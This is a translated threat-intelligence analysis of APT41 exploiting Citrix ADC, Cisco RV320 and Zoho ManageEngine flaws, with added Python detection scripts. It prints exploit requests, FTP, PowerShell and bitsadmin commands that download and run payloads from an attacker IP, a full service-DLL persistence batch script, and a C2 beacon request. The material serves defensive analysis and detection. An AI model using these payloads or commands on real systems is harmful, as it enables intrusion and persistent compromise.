2025-01-18 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article shares an analysis of APT41's multi-vulnerability network attack campaign. The editor finds it quite practical and is sharing it so that everyone can learn from it. We hope you take something away from reading it. Without further ado, let's take a look.
Exploitation of CVE-2019-19781 (Citrix Application Delivery Controller [ADC])
Starting January 20, 2020, APT41 used IP address 66.42.98[.]220 to attempt to exploit CVE-2019-19781 (released December 17, 2019).
Timeline:
The initial exploitation of CVE-2019-19781 occurred on January 20, 2020 and January 21, 2020, and executed the command 'file /bin/pwd'. This serves two purposes. First, it confirms whether the system is vulnerable and whether the relevant mitigations have been deployed. Second, it returns information about the target's architecture, which informs the subsequent deployment of an APT41 backdoor.
All observed requests were made only against Citrix devices; APT41 operated with a list of known devices.
HTTP POST example:
POST /vpns/portal/scripts/newbm.pl HTTP/1.1
Host: [redacted]
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.22.0
NSC_NONCE: nsroot
NSC_USER: ../../../netscaler/portal/templates/[redacted]
Content-Length: 96

url=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = 'print `file /bin/pwd`') %]
APT41 activity was suspended between January 23 and February 1. On February 1, APT41 began exploiting CVE-2019-19781 again, this time with payloads downloaded via FTP. APT41 executed the command '/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/bsd', which connected to 66.42.98[.]220, logged in to the FTP server with the username "test" and a password, and downloaded the "bsd" payload (possibly a backdoor).
HTTP POST example:
POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Accept-Encoding: identity
Content-Length: 147
Connection: close
Nsc_User: ../../../netscaler/portal/templates/[redacted]
User-Agent: Python-urllib/2.7
Nsc_Nonce: nsroot
Host: [redacted]
Content-Type: application/x-www-form-urlencoded

url=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = 'print `/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/bsd`') %]
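The requests above share a recognizable shape: the newbm.pl script path, a "../" sequence in the URI or in the NSC_USER header, and a template directive in the body. The following is an added detection example, not code from the original article; the indicator names, the host and the PLACEHOLDER values are assumptions, and the sample requests are constructed.

```python
import re
from urllib.parse import unquote

TARGET = re.compile(r"/vpns/portal/scripts/newbm\.pl", re.I)  # script hit in the requests above
TRAVERSAL = re.compile(r"\.\./")
TEMPLATE = re.compile(r"\[%.*?template\.new\(.*?%\]", re.S | re.I)
BACKTICK_CMD = re.compile(r"`([^`]+)`")

def parse_request(raw):
    """Split a raw HTTP request into (request line, lower-cased header dict, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()  # NSC_USER and Nsc_User are the same header
    return lines[0], headers, body

def score_request(raw):
    """Return the indicators found in one request; an empty list means none matched."""
    request_line, headers, body = parse_request(raw)
    parts = request_line.split(" ")
    path = unquote(parts[1]) if len(parts) > 1 else ""
    body = unquote(body)
    hits = []
    if TARGET.search(path):
        hits.append("newbm.pl")
    if TRAVERSAL.search(path):
        hits.append("traversal-in-uri")
    if TRAVERSAL.search(unquote(headers.get("nsc_user", ""))):
        hits.append("traversal-in-nsc_user")
    if TEMPLATE.search(body):
        hits.append("template-directive-in-body")
        hits += ["cmd:" + c for c in BACKTICK_CMD.findall(body)]
    return hits

# Constructed samples modelled on the requests above; host and template name are placeholders.
SUSPICIOUS = (
    "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1\r\n"
    "Host: adc.example.test\r\n"
    "Nsc_User: ../../../netscaler/portal/templates/PLACEHOLDER\r\n"
    "Nsc_Nonce: nsroot\r\n\r\n"
    "url=http://example.com&title=PLACEHOLDER&desc=[% template.new('BLOCK' = 'print `file /bin/pwd`') %]"
)
BENIGN = "GET /vpn/index.html HTTP/1.1\r\nHost: adc.example.test\r\n\r\n"

if __name__ == "__main__":
    for name, req in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(name, score_request(req))
```

The extracted "cmd:" values give responders the command each request carried, which is how the 'file /bin/pwd' probes and the later FTP download requests can be told apart in captured traffic.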
Exploitation of CVE-2019-19781 increased significantly on February 24 and February 25, with only the payload name changing.
POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Accept-Encoding: identity
Content-Length: 145
Connection: close
Nsc_User: ../../../netscaler/portal/templates/[redacted]
User-Agent: Python-urllib/2.7
Nsc_Nonce: nsroot
Host: [redacted]
Content-Type: application/x-www-form-urlencoded

url=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = 'print `/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/un`') %]

Cisco Router
APT41 successfully attacked a Cisco RV320 router at a telecommunications organization and downloaded a 64-bit MIPS payload named "fuc" (MD5: 155e98e5ca8d662fad7dc84187340cbc). The Metasploit module combines two CVEs (CVE-2019-1653 and CVE-2019-1652) to enable remote code execution on Cisco RV320 and RV325 small business routers and to download payloads using wget.
66.42.98[.]220 also hosted the file http://66.42.98[.]220/test/1.txt (MD5: c0c467c8e9b2046d7053642cc9bdd57d), which reads "cat /etc/flash/etc/nk_sysconfig", a command executed on Cisco RV320 routers to display the current configuration.
Cisco Small Business RV320 and RV325 Routers Information Disclosure Vulnerability
Cisco Small Business RV320 and RV325 Routers Command Injection Vulnerability
CVE-2020-10189 (Zoho ManageEngine Zero-Day Vulnerability)
On March 5, researchers released proof-of-concept code for CVE-2020-10189. Starting March 8, APT41 used 91.208.184[.]78 to attempt to exploit the Zoho ManageEngine vulnerability. The payloads (install.bat and storesyncsvc.dll) were delivered in two different variations. In the first variant, CVE-2020-10189 was exploited to directly upload "logger.zip", which contains a set of commands that use PowerShell to download and execute install.bat and storesyncsvc.dll.
java/lang/Runtime
getRuntime
()Ljava/lang/Runtime;
Xcmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/install.bat','C:\Windows\Temp\install.bat')&powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/storesyncsvc.dll','C:\Windows\Temp\storesyncsvc.dll')&C:\Windows\Temp\install.bat
'(Ljava/lang/String;)Ljava/lang/Process;
StackMapTable
ysoserial/Pwner76328858520609
Lysoserial/Pwner76328858520609;
In the second variant, APT41 used the Microsoft BITSAdmin tool to download install.bat (MD5: 7966c2c546b71e800397a67f942858d0) from 66.42.98[.]220 on port 12345.
Parent Process: C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe
Process Arguments: cmd /c bitsadmin /transfer bbbb http://66.42.98[.]220:12345/test/install.bat C:\Users\Public\install.bat
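Both variants end with the Desktop Central JVM spawning a command line that downloads a file, which is uncommon for that process and worth an alert. The following is an added detection example over process-creation events, not code from the original article; the event field names (host, parent_image, command_line) and the sample events, which use a documentation IP address, are assumptions.

```python
import re

# Parent image from the process record above: the Desktop Central server's bundled JVM.
PARENT = re.compile(r"\\ManageEngine\\DesktopCentral_Server\\jre\\bin\\java\.exe$", re.I)
# Download techniques of the two variants: BITSAdmin transfer and PowerShell WebClient.
BITS = re.compile(r"\bbitsadmin(?:\.exe)?\s+/transfer\s+.*?(?P<url>https?://\S+)\s+(?P<dest>\S+)", re.I)
PS_DL = re.compile(r"DownloadFile\(\s*'(?P<url>https?://[^']+)'\s*,\s*'(?P<dest>[^']+)'\s*\)", re.I)

def find_downloads(command_line):
    """Return one record per file download found in a command line."""
    found = []
    for technique, rx in (("bitsadmin", BITS), ("powershell-webclient", PS_DL)):
        for m in rx.finditer(command_line):
            # Variant one chains "&<dest>" after the download to run the file at once.
            rest = command_line[m.end():].lower()
            found.append({"technique": technique, "url": m["url"], "dest": m["dest"],
                          "executed_after": m["dest"].lower() in rest})
    return found

def triage(events):
    """Alert on downloads launched by a child of the Desktop Central JVM."""
    alerts = []
    for ev in events:
        if PARENT.search(ev["parent_image"]):
            alerts += [{"host": ev["host"], **d} for d in find_downloads(ev["command_line"])]
    return alerts

# Constructed events; 203.0.113.10 is a documentation address, not an indicator.
JVM = r"C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe"
EVENTS = [
    {"host": "dc01", "parent_image": JVM, "command_line":
     r"cmd /c bitsadmin /transfer job1 http://203.0.113.10:12345/test/install.bat C:\Users\Public\install.bat"},
    {"host": "dc01", "parent_image": JVM, "command_line":
     r"cmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile("
     r"'http://203.0.113.10:12345/test/install.bat','C:\Windows\Temp\install.bat')&C:\Windows\Temp\install.bat"},
    {"host": "ws07", "parent_image": r"C:\Windows\explorer.exe", "command_line":
     r"bitsadmin /transfer upd http://203.0.113.10/a.bin C:\Temp\a.bin"},
]

if __name__ == "__main__":
    for alert in triage(EVENTS):
        print(alert)
```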
Both variants use an install.bat batch file to install a file named storesyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f).
install.bat Content:
@echo off
set "WORK_DIR=C:\Windows\System32"
set "DLL_NAME=storesyncsvc.dll"
set "SERVICE_NAME=StorSyncSvc"
set "DISPLAY_NAME=Storage Sync Service"
set "DESCRIPTION=The Storage Sync Service is the top-level resource for File Sync. It creates sync relationships with multiple storage accounts via multiple sync groups. If this service is stopped or disabled, applications will be unable to run collectly."
sc stop %SERVICE_NAME%
sc delete %SERVICE_NAME%
mkdir %WORK_DIR%
copy "%~dp0%DLL_NAME%" "%WORK_DIR%" /Y
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v "%SERVICE_NAME%" /t REG_MULTI_SZ /d "%SERVICE_NAME%" /f
sc create "%SERVICE_NAME%" binPath= "%SystemRoot%\system32\svchost.exe -k %SERVICE_NAME%" type= share start= auto error= ignore DisplayName= "%DISPLAY_NAME%"
SC failure "%SERVICE_NAME%" reset= 86400 actions= restart/60000/restart/60000/restart/60000
sc description "%SERVICE_NAME%" "%DESCRIPTION%"
reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /v "ServiceDll" /t REG_EXPAND_SZ /d "%WORK_DIR%\%DLL_NAME%" /f
net start "%SERVICE_NAME%"
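The script above registers a new svchost.exe service group, creates a shared service in that group, and points its ServiceDll at the copied DLL. The following is an added triage example, not code from the original article, that resolves the batch variables and reports this persistence pattern in a recovered script; the function names and the sample script (ExampleSvc, example.dll) are constructed assumptions.

```python
import re

SET = re.compile(r'^set\s+"(\w+)=(.*)"\s*$', re.I)
GROUP = re.compile(r'reg\s+add\s+"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion'
                   r'\\Svchost"\s+/v\s+"([^"]+)"', re.I)
CREATE = re.compile(r'sc\s+create\s+"([^"]+)"\s+binPath=\s*'
                    r'"[^"]*svchost\.exe\s+-k\s+([^"\s]+)"', re.I)
SVCDLL = re.compile(r'reg\s+add\s+"HKLM\\SYSTEM\\CurrentControlSet\\Services\\([^\\"]+)'
                    r'\\Parameters"\s+/v\s+"ServiceDll".*?/d\s+"([^"]+)"', re.I)

def expand(lines):
    """Apply set "NAME=value" lines to later %NAME% references; unknown names stay as-is."""
    env, out = {}, []
    for line in lines:
        line = re.sub(r"%(\w+)%", lambda m: env.get(m.group(1).upper(), m.group(0)), line.strip())
        m = SET.match(line)
        if m:
            env[m.group(1).upper()] = m.group(2)
        elif line:
            out.append(line)
    return out

def find_svchost_persistence(lines):
    """Report svchost-hosted services whose ServiceDll is set by the same script."""
    groups, created, dlls = set(), {}, {}
    for line in expand(lines):
        if (m := GROUP.search(line)):
            groups.add(m.group(1).lower())
        elif (m := CREATE.search(line)):
            created[m.group(1).lower()] = m.group(2)
        elif (m := SVCDLL.search(line)):
            dlls[m.group(1).lower()] = m.group(2)
    return [{"service": s, "group": g, "service_dll": dlls[s],
             "new_svchost_group": g.lower() in groups}
            for s, g in created.items() if s in dlls]

# Constructed script modelled on the one above, with placeholder service and DLL names.
SAMPLE = r'''
@echo off
set "WORK_DIR=C:\Windows\System32"
set "DLL_NAME=example.dll"
set "SERVICE_NAME=ExampleSvc"
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v "%SERVICE_NAME%" /t REG_MULTI_SZ /d "%SERVICE_NAME%" /f
sc create "%SERVICE_NAME%" binPath= "%SystemRoot%\system32\svchost.exe -k %SERVICE_NAME%" type= share start= auto
reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /v "ServiceDll" /t REG_EXPAND_SZ /d "%WORK_DIR%\%DLL_NAME%" /f
'''.splitlines()

if __name__ == "__main__":
    print(find_svchost_persistence(SAMPLE))
```

A result with "new_svchost_group" set to True means the script created its own svchost group rather than joining an existing one, which is the combination seen in install.bat.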
Connection to the C2 server:
GET /jquery-3.3.1.min.js HTTP/1.1
Host: cdn.bootcss.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://cdn.bootcss.com/
Accept-Encoding: gzip, deflate
Cookie: __cfduid=CdkIb8kXFOR_9Mn48DQwhIEuIEgn2VGDa_XZK_xAN47OjPNRMpJawYvnAhPJYMDA8y_rXEJQGZ6Xlkp_wCoqnImD-bj4DqdTNbj87Rl1kIvZbefE3nmNunlyMJZTrDZfu4EV6oxB8yKMJfLXydC5YF9OeZwqBSs3Tun12BVFWLI
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Connection: Keep-Alive
Cache-Control: no-cache
Within hours of the exploit, APT41 used the storesyncsvc.dll BEACON backdoor to download an auxiliary backdoor with a different C2 address, and then downloaded 2.exe (MD5: 3e856162c36b532925c8226b4ed3481c). 2.exe is a VMProtected Meterpreter downloader used to download Cobalt Strike BEACON shellcode. The group uses multiple intrusions to delay analysis of its other tools.
APT41's scanning and attacks in this activity reflect increasingly fast exploitation of vulnerabilities and a gradually expanding scope of target information collection. APT41 successfully used CVE-2019-3396 (Atlassian Confluence) to attack a university in the United States. This shows that APT41 engages in espionage as well as network activity motivated by economic interests.
That concludes this analysis of APT41's multi-vulnerability network attacks. The editor believes some of these points are things we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.